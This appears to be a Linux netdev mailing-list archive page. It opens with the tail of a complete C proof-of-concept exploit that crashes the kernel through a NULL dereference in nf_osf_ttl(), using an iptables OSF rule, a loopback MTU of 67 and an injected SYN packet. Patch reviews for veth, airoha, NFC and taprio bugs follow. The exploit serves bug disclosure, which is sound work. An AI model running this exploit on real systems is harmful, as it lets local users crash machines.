unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_entries;
unsigned int size;
};
struct ipt_replace {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int num_entries;
unsigned int size;
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_counters;
struct xt_counters *counters;
/* entries follow */
};
/* nf_osf_info — iptables match data for xt_osf */
#define NF_OSF_GENRE (1 << 0)
#define NF_OSF_TTL_FLAG (1 << 1) /* NF_OSF_TTL in the kernel */
#define NF_OSF_TTL_LESS 1
struct nf_osf_info {
char genre[MAXGENRELEN];
__u32 len;
__u32 flags;
__u32 loglevel;
__u32 ttl;
};
/* IP / TCP headers for packet crafting */
struct iphdr {
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
__u8 ihl:4, version:4;
#else
__u8 version:4, ihl:4;
#endif
__u8 tos;
__u16 tot_len;
__u16 id;
__u16 frag_off;
__u8 ttl;
__u8 protocol;
__u16 check;
__u32 saddr;
__u32 daddr;
};
struct tcphdr {
__u16 source;
__u16 dest;
__u32 seq;
__u32 ack_seq;
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
__u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
#else
__u16 doff:4, res1:4, cwr:1, ece:1, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
__u16 window;
__u16 check;
__u16 urg_ptr;
};
/* AF_PACKET / Ethernet */
#ifndef AF_PACKET
#define AF_PACKET 17
#endif
#define ETH_P_IP 0x0800
#define ETH_P_ALL 0x0003
#define ETH_HLEN 14
#define ETH_ALEN 6
struct sockaddr_ll {
unsigned short sll_family;
__be16 sll_protocol;
int sll_ifindex;
unsigned short sll_hatype;
unsigned char sll_pkttype;
unsigned char sll_halen;
unsigned char sll_addr[8];
};
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
#define DIE(fmt, ...) do { \
fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); \
exit(1); \
} while (0)
#define LOG(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__)
static __u16 ip_checksum(const void *buf, int len)
{
const __u16 *p = buf;
__u32 sum = 0;
while (len > 1) {
sum += *p++;
len -= 2;
}
if (len == 1)
sum += *(__u8 *)p;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (__u16)~sum;
}
/* ------------------------------------------------------------------ */
/* Step 1: Load OSF fingerprint via nfnetlink */
/* ------------------------------------------------------------------ */
static void load_osf_fingerprint(void)
{
int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
if (fd < 0)
DIE("socket(NETLINK_NETFILTER): %s", strerror(errno));
struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
DIE("bind(netlink): %s", strerror(errno));
struct nf_osf_user_finger finger;
memset(&finger, 0, sizeof(finger));
finger.wss.wc = OSF_WSS_PLAIN;
finger.wss.val = 0;
finger.ttl = 64;
finger.df = 0;
finger.ss = 40;
finger.mss = 0;
finger.opt_num = 0;
strncpy(finger.genre, "Linux", MAXGENRELEN);
int finger_attr_len = NLA_HDRLEN + sizeof(finger);
int nfmsg_len = NLMSG_ALIGN(sizeof(struct nfgenmsg)) + NLA_ALIGN(finger_attr_len);
int total_len = NLMSG_LENGTH(nfmsg_len);
char *buf = calloc(1, total_len);
if (!buf) DIE("calloc");
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
nlh->nlmsg_len = total_len;
nlh->nlmsg_type = (NFNL_SUBSYS_OSF << 8) | OSF_MSG_ADD;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK;
nlh->nlmsg_seq = 1;
nlh->nlmsg_pid = getpid();
struct nfgenmsg *nfg = (struct nfgenmsg *)(buf + NLMSG_HDRLEN);
nfg->nfgen_family = AF_UNSPEC;
nfg->version = NFNETLINK_V0;
nfg->res_id = 0;
struct nlattr *nla = (struct nlattr *)(buf + NLMSG_HDRLEN +
NLMSG_ALIGN(sizeof(struct nfgenmsg)));
nla->nla_len = finger_attr_len;
nla->nla_type = OSF_ATTR_FINGER;
memcpy((char *)nla + NLA_HDRLEN, &finger, sizeof(finger));
struct sockaddr_nl dest = { .nl_family = AF_NETLINK };
if (sendto(fd, buf, total_len, 0,
(struct sockaddr *)&dest, sizeof(dest)) < 0)
DIE("sendto(OSF_MSG_ADD): %s", strerror(errno));
char rbuf[4096];
int n = recv(fd, rbuf, sizeof(rbuf), 0);
if (n < 0)
DIE("recv(netlink): %s", strerror(errno));
struct nlmsghdr *rnlh = (struct nlmsghdr *)rbuf;
if (rnlh->nlmsg_type == NLMSG_ERROR) {
int *errp = (int *)(rbuf + NLMSG_HDRLEN);
if (*errp != 0)
DIE("OSF fingerprint load failed: %s (err=%d)",
strerror(-*errp), *errp);
}
LOG("OSF fingerprint loaded (genre=Linux, ttl=64, ss=40, df=0)");
free(buf);
close(fd);
}
/* ------------------------------------------------------------------ */
/* Step 2: Set up iptables raw table with xt_osf match */
/* ------------------------------------------------------------------ */
#define SIZEOF_IPT_ENTRY (XT_ALIGN(sizeof(struct ipt_entry)))
#define SIZEOF_MATCH_OSF (XT_ALIGN(sizeof(struct xt_entry_match) + sizeof(struct nf_osf_info)))
#define SIZEOF_STD_TARGET (XT_ALIGN(sizeof(struct xt_standard_target)))
#define SIZEOF_ERR_TARGET (XT_ALIGN(sizeof(struct xt_error_target)))
#define ENTRY0_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF + SIZEOF_STD_TARGET)
#define ENTRY1_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY2_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY3_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_ERR_TARGET)
#define ENTRIES_SIZE (ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE + ENTRY3_SIZE)
static void setup_iptables_osf(void)
{
int rawfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (rawfd < 0)
DIE("socket(RAW): %s", strerror(errno));
struct ipt_getinfo info;
memset(&info, 0, sizeof(info));
strncpy(info.name, "raw", XT_TABLE_MAXNAMELEN);
socklen_t optlen = sizeof(info);
if (getsockopt(rawfd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen) < 0)
DIE("getsockopt(IPT_SO_GET_INFO): %s", strerror(errno));
LOG("raw table: valid_hooks=0x%x, num_entries=%u, size=%u",
info.valid_hooks, info.num_entries, info.size);
unsigned int old_num_entries = info.num_entries;
size_t repl_size = sizeof(struct ipt_replace) + ENTRIES_SIZE;
char *blob = calloc(1, repl_size);
if (!blob) DIE("calloc");
struct ipt_replace *repl = (struct ipt_replace *)blob;
strncpy(repl->name, "raw", XT_TABLE_MAXNAMELEN);
repl->valid_hooks = (1 << NF_INET_PRE_ROUTING) | (1 << NF_INET_LOCAL_OUT);
repl->num_entries = 4;
repl->size = ENTRIES_SIZE;
unsigned int off0 = 0;
unsigned int off1 = ENTRY0_SIZE;
unsigned int off2 = ENTRY0_SIZE + ENTRY1_SIZE;
unsigned int off3 = ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE;
repl->hook_entry[NF_INET_PRE_ROUTING] = off0;
repl->hook_entry[NF_INET_LOCAL_OUT] = off2;
repl->underflow[NF_INET_PRE_ROUTING] = off1;
repl->underflow[NF_INET_LOCAL_OUT] = off2;
repl->num_counters = old_num_entries;
struct xt_counters *ctrs = calloc(old_num_entries, sizeof(struct xt_counters));
if (!ctrs) DIE("calloc counters");
repl->counters = ctrs;
char *entries = blob + sizeof(struct ipt_replace);
/* Entry 0: OSF match rule in PREROUTING */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off0);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->ip.proto = IPPROTO_TCP;
e->target_offset = SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF;
e->next_offset = ENTRY0_SIZE;
struct xt_entry_match *m = (struct xt_entry_match *)(entries + off0 + SIZEOF_IPT_ENTRY);
memset(m, 0, SIZEOF_MATCH_OSF);
m->u.user.match_size = SIZEOF_MATCH_OSF;
strncpy(m->u.user.name, "osf", XT_EXTENSION_MAXNAMELEN);
m->u.user.revision = 0;
struct nf_osf_info *osf = (struct nf_osf_info *)m->data;
memset(osf, 0, sizeof(*osf));
strncpy(osf->genre, "Linux", MAXGENRELEN);
osf->flags = NF_OSF_GENRE | NF_OSF_TTL_FLAG;
osf->ttl = NF_OSF_TTL_LESS;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off0 + e->target_offset);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 1: PREROUTING policy (underflow) */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off1);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY1_SIZE;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off1 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 2: OUTPUT policy (underflow) */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off2);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY2_SIZE;
struct xt_standard_target *t = (struct xt_standard_target *)
(entries + off2 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_STD_TARGET);
t->target.u.user.target_size = SIZEOF_STD_TARGET;
t->verdict = -NF_ACCEPT - 1;
}
/* Entry 3: ERROR target */
{
struct ipt_entry *e = (struct ipt_entry *)(entries + off3);
memset(e, 0, SIZEOF_IPT_ENTRY);
e->target_offset = SIZEOF_IPT_ENTRY;
e->next_offset = ENTRY3_SIZE;
struct xt_error_target *t = (struct xt_error_target *)
(entries + off3 + SIZEOF_IPT_ENTRY);
memset(t, 0, SIZEOF_ERR_TARGET);
t->target.u.user.target_size = SIZEOF_ERR_TARGET;
strncpy(t->target.u.user.name, "ERROR", XT_EXTENSION_MAXNAMELEN);
strncpy(t->errorname, "ERROR", XT_FUNCTION_MAXNAMELEN);
}
LOG("Replacing raw table: %u entries, %u bytes", repl->num_entries, repl->size);
if (setsockopt(rawfd, SOL_IP, IPT_SO_SET_REPLACE, blob, repl_size) < 0)
DIE("setsockopt(IPT_SO_SET_REPLACE): %s (errno=%d)",
strerror(errno), errno);
LOG("iptables raw table replaced with OSF match rule");
free(ctrs);
free(blob);
close(rawfd);
}
/* ------------------------------------------------------------------ */
/* Step 3: Destroy lo's in_dev via MTU trick */
/* ------------------------------------------------------------------ */
/*
* loopback driver (loopback.c) uses gen_lo_setup() which does NOT call
* ether_setup(), so dev->min_mtu stays at the default 0.
* This allows setting MTU below IPV4_MIN_MTU (68).
*
* Setting MTU to 67 triggers:
* NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → fallthrough → inetdev_destroy(in_dev)
* → RCU_INIT_POINTER(dev->ip_ptr, NULL)
*/
static void setup_loopback(void)
{
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
ifr.ifr_mtu = 67;
if (ioctl(sfd, SIOCSIFMTU, &ifr) < 0)
DIE("ioctl(SIOCSIFMTU lo 67): %s", strerror(errno));
close(sfd);
LOG("lo: MTU set to 67 → inetdev_destroy → ip_ptr = NULL");
}
/* ------------------------------------------------------------------ */
/* Step 4: Inject crafted SYN packet via AF_PACKET on lo */
/* ------------------------------------------------------------------ */
static void inject_syn(void)
{
/*
* lo ifindex is always LOOPBACK_IFINDEX = 1,
* but we look it up to be safe.
*/
int sfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
if (ioctl(sfd, SIOCGIFINDEX, &ifr) < 0)
DIE("SIOCGIFINDEX(lo): %s", strerror(errno));
int ifindex = ifr.ifr_ifindex;
close(sfd);
LOG("lo: ifindex=%d", ifindex);
int pfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (pfd < 0)
DIE("socket(AF_PACKET): %s", strerror(errno));
/*
* 54-byte Ethernet frame: [14 ETH][20 IP][20 TCP]
*
* loopback_xmit() calls eth_type_trans(skb, dev) which:
* - Strips ETH header, sets skb->protocol from EtherType
* - Sets pkt_type based on DST MAC vs dev MAC
* - lo MAC = 00:00:00:00:00:00 → DST=all-zeros → PACKET_HOST
* Then calls __netif_rx(skb) → RX path → ip_rcv → PREROUTING.
*
* IP: TTL=255 > fingerprint TTL(64) → takes TTL_LESS path in nf_osf_ttl
* DF=0 → matches fingerprint df=0 → nf_osf_fingers[0]
* tot_len=40 → matches fingerprint ss=40
* TCP: SYN=1, doff=5, no options → matches opt_num=0
*/
char frame[54];
memset(frame, 0, sizeof(frame));
/* Ethernet header: DST=00:00:00:00:00:00 (lo MAC → PACKET_HOST) */
unsigned char *eth = (unsigned char *)frame;
/* DST already zero from memset */
eth[ETH_ALEN + 5] = 0x01; /* SRC: 00:00:00:00:00:01 */
eth[12] = (ETH_P_IP >> 8) & 0xff; /* EtherType: 0x0800 (IPv4) */
eth[13] = ETH_P_IP & 0xff;
/* IP header */
struct iphdr *ip = (struct iphdr *)(frame + ETH_HLEN);
ip->version = 4;
ip->ihl = 5;
ip->tot_len = htons(40);
ip->id = htons(0x1234);
ip->frag_off = 0; /* DF=0 */
ip->ttl = 255; /* > fingerprint TTL 64 */
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr("10.0.0.2");
ip->daddr = inet_addr("10.0.0.1");
ip->check = 0;
ip->check = ip_checksum(ip, 20);
/* TCP header */
struct tcphdr *tcp = (struct tcphdr *)(frame + ETH_HLEN + 20);
tcp->source = htons(12345);
tcp->dest = htons(80);
tcp->seq = htonl(0xdeadbeef);
tcp->doff = 5; /* no TCP options */
tcp->syn = 1;
tcp->window = htons(1024);
LOG("Injecting SYN via lo: TTL=255, DF=0, tot_len=40, SYN");
LOG("Crash path: AF_PACKET → loopback_xmit → __netif_rx");
LOG(" → ip_rcv(lo) → NF_INET_PRE_ROUTING → xt_osf");
LOG(" → nf_osf_ttl: __in_dev_get_rcu(lo) = NULL → CRASH");
struct sockaddr_ll sll;
memset(&sll, 0, sizeof(sll));
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_IP);
sll.sll_ifindex = ifindex;
sll.sll_halen = ETH_ALEN;
/* sll_addr left as zeros (matching lo MAC) */
ssize_t n = sendto(pfd, frame, sizeof(frame), 0,
(struct sockaddr *)&sll, sizeof(sll));
if (n < 0)
DIE("sendto(AF_PACKET): %s", strerror(errno));
LOG("Packet injected (%zd bytes), waiting for kernel crash...", n);
close(pfd);
}
/* ------------------------------------------------------------------ */
/* main */
/* ------------------------------------------------------------------ */
int main(void)
{
LOG("=== nf_osf_ttl() NULL pointer dereference PoC ===");
LOG("Method: loopback MTU trick (MTU=67 < 68 → inetdev_destroy)");
/* Step 1: Load OSF fingerprint */
load_osf_fingerprint();
/* Step 2: Set up iptables raw table with OSF match */
setup_iptables_osf();
/* Step 3: Destroy lo's in_dev by setting MTU < IPV4_MIN_MTU */
setup_loopback();
/* Step 4: Inject SYN packet → triggers NULL deref */
inject_syn();
/* If we reach here, the bug didn't trigger */
sleep(3);
LOG("No crash detected — bug may be patched in this kernel.");
return 1;
}
```
^ permalink raw reply
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:33 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk
Cc: netdev, linux-kernel, syzkaller-bugs, syzbot
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
(forgotten to Cc the right list)
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device
*dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
^ permalink raw reply related
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Paolo Abeni @ 2026-04-14 8:29 UTC (permalink / raw)
To: lorenzo
Cc: edumazet, kuba, davem, netdev, andrew+netdev, pabeni,
linux-arm-kernel, linux-mediatek
In-Reply-To: <20260411-airoha-fix-ndo_stop-v1-1-caddaa181739@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
---
net: airoha: Wait for TX to complete in airoha_dev_stop()
Wait for TX to complete in airoha_dev_stop routine before stopping the
TX DMA and run airoha_qdma_cleanup_tx_queue routine. Moreover,
start/stop TX/RX NAPIs in ndo_open()/ndo_stop() callbacks in order to be
sure the TX NAPIs have completed before stopping the TX DMA engine in
airoha_dev_stop routine.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 8e4b043af4bc..9e40c8f375c1 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
[ ... ]
> @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> struct airoha_qdma *qdma = port->qdma;
> int i, err;
>
> - netif_tx_disable(dev);
> err = airoha_set_vip_for_gdm_port(port, false);
> if (err)
> return err;
>
> - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> - netdev_tx_reset_subqueue(dev, i);
> -
> airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> FE_PSE_PORT_DROP);
>
> + netif_tx_disable(dev);
> if (atomic_dec_and_test(&qdma->users)) {
> + u32 val;
> +
> + /* Wait for TX to complete */
> + err = read_poll_timeout(airoha_qdma_rr, val,
> + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> + false, qdma, REG_QDMA_GLOBAL_CFG);
> + if (err)
> + return err;
> ^^^^^^^^^^
Can this leave the device in an inconsistent state? When read_poll_timeout()
fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
immediately. However, atomic_dec_and_test(&qdma->users) has already
decremented qdma->users to 0, but airoha_qdma_stop_napi() was never called,
so all NAPIs remain enabled.
The networking core (__dev_close_many in net/core/dev.c) ignores the
ndo_stop return value and marks the device as down regardless. When the
device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
because the NAPI was never disabled.
The early return also skips the netdev_tx_reset_subqueue() calls at the end
of the function.
Should the code either continue with cleanup on timeout (don't return), or
ensure NAPI and DMA state are properly cleaned up before returning?
> +
> + airoha_qdma_stop_napi(qdma);
> airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> GLOBAL_CFG_TX_DMA_EN_MASK |
> GLOBAL_CFG_RX_DMA_EN_MASK);
[ ... ]
^ permalink raw reply
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Simon Horman @ 2026-04-14 8:28 UTC (permalink / raw)
To: Lekë Hapçiu
Cc: netdev, davem, edumazet, kuba, pabeni, linux-nfc, stable,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-2-snowwlake@icloud.com>
On Thu, Apr 09, 2026 at 08:59:56PM +0200, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
> offset from the peer-supplied length field:
>
> ndev->remote_gb_len = min_t(__u8,
> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
> NFC_ATR_RES_GB_MAXSIZE);
>
> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
> wraps in unsigned u8 arithmetic:
>
> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>
> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
> 47 bytes from beyond the end of the valid activation parameter data into
> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
> as a TLV array, feeding directly into the TLV parser hardened by the
> companion patch.
>
> Fix: add an explicit lower-bound check on each length field before the
> subtraction. If the length is smaller than the required offset the frame
> is malformed; leave remote_gb_len at zero and skip the memcpy.
>
> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
> fixed symmetrically.
>
> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
> activation, before any authentication or pairing. The bug is therefore
> reachable from any NFC peer within ~4 cm.
>
> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
The above commit seems to move rather than add the logic in question.
It seems to me that the following would be the fixes tag corresponding
to the commit that introduced this problem.
Fixes: 767f19ae698e ("NFC: Implement NCI dep_link_up and dep_link_down")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
> 1 file changed, 14 insertions(+), 8 deletions(-)
>
> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
> index c96512bb8..8eb295580 100644
> --- a/net/nfc/nci/ntf.c
> +++ b/net/nfc/nci/ntf.c
> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
> switch (ntf->activation_rf_tech_and_mode) {
> case NCI_NFC_A_PASSIVE_POLL_MODE:
> case NCI_NFC_F_PASSIVE_POLL_MODE:
> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
> + NFC_ATR_RES_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.poll_nfc_dep.atr_res_len
> - - NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res_len
> + - NFC_ATR_RES_GT_OFFSET,
> NFC_ATR_RES_GB_MAXSIZE);
I'm not suggesting changing this, at least not as part of this bug fix, so
this comment is FTR: As NFC_ATR_RES_GB_MAXSIZE is a compile time constant,
and the condition added by this patch ensures that the result of the
subtraction is not negative, I strongly suspect that using min() here
sufficient and thus more appropriate than min_t().
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.poll_nfc_dep.atr_res
> - + NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res
> + + NFC_ATR_RES_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> case NCI_NFC_A_PASSIVE_LISTEN_MODE:
> case NCI_NFC_F_PASSIVE_LISTEN_MODE:
> + if (ntf->activation_params.listen_nfc_dep.atr_req_len <
> + NFC_ATR_REQ_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.listen_nfc_dep.atr_req_len
> - - NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req_len
> + - NFC_ATR_REQ_GT_OFFSET,
> NFC_ATR_REQ_GB_MAXSIZE);
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.listen_nfc_dep.atr_req
> - + NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req
> + + NFC_ATR_REQ_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> --
> 2.51.0
>
^ permalink raw reply
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Weiming Shi @ 2026-04-14 8:28 UTC (permalink / raw)
To: Paolo Abeni
Cc: Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski, Simon Horman,
Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <6f4ebd09-9fa9-4b6e-97b5-a6b1fcec8774@redhat.com>
On 26-04-14 10:16, Paolo Abeni wrote:
> On 4/10/26 5:39 PM, Weiming Shi wrote:
> > When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> > is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> > Subsequent RTM_GETTCLASS dump operations walk all classes via
> > taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> > returning the NULL pointer, then dereferences it to read child->handle,
> > causing a kernel NULL pointer dereference.
> >
> > The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> > with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> > namespaces enabled, an unprivileged local user can trigger a kernel
> > panic by creating a taprio qdisc inside a new network namespace,
> > grafting an explicit child qdisc, deleting it, and requesting a class
> > dump. The RTM_GETTCLASS dump itself requires no capability.
> >
> > Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> > KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> > RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> > Call Trace:
> > <TASK>
> > tc_fill_tclass (net/sched/sch_api.c:1966)
> > qdisc_class_dump (net/sched/sch_api.c:2329)
> > taprio_walk (net/sched/sch_taprio.c:2510)
> > tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> > tc_dump_tclass_root (net/sched/sch_api.c:2370)
> > tc_dump_tclass (net/sched/sch_api.c:2431)
> > rtnl_dumpit (net/core/rtnetlink.c:6827)
> > netlink_dump (net/netlink/af_netlink.c:2325)
> > rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> > netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> > </TASK>
> >
> > Fix this by substituting &noop_qdisc when new is NULL in
> > taprio_graft(), following the same pattern used by multiq_graft() and
> > prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> > control-plane dump paths safe without requiring individual NULL checks.
> >
> > Also update the data-plane NULL guards in taprio_enqueue() and
> > taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> > are still dropped cleanly without inflating qlen/backlog counters.
> >
> > Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> > v2:
> > - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> > to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> > counter inflation when noop_qdisc drops packets (Sashiko)
> > ---
> > net/sched/sch_taprio.c | 11 +++++++----
> > 1 file changed, 7 insertions(+), 4 deletions(-)
> >
> > diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> > index f721c03514f60..XXXXXXXXX 100644
> > --- a/net/sched/sch_taprio.c
> > +++ b/net/sched/sch_taprio.c
> > @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
> >
> > child = q->qdiscs[queue];
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return qdisc_drop(skb, sch, to_free);
> >
> > if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> > @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> > int prio;
> > int len;
> > u8 tc;
> >
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return NULL;
> >
> > if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> > @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > if (!dev_queue)
> > return -EINVAL;
> >
> > + if (!new)
> > + new = &noop_qdisc;
> > +
> > if (dev->flags & IFF_UP)
> > dev_deactivate(dev);
> >
> > @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > *old = q->qdiscs[cl - 1];
> > if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> > WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> > - if (new)
> > + if (new != &noop_qdisc)
> > qdisc_refcount_inc(new);
> > if (*old)
> > qdisc_put(*old);
> > }
> >
> > q->qdiscs[cl - 1] = new;
> > - if (new)
> > + if (new != &noop_qdisc)
> > new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
> >
> > if (dev->flags & IFF_UP)
> > --
> > 2.43.0
>
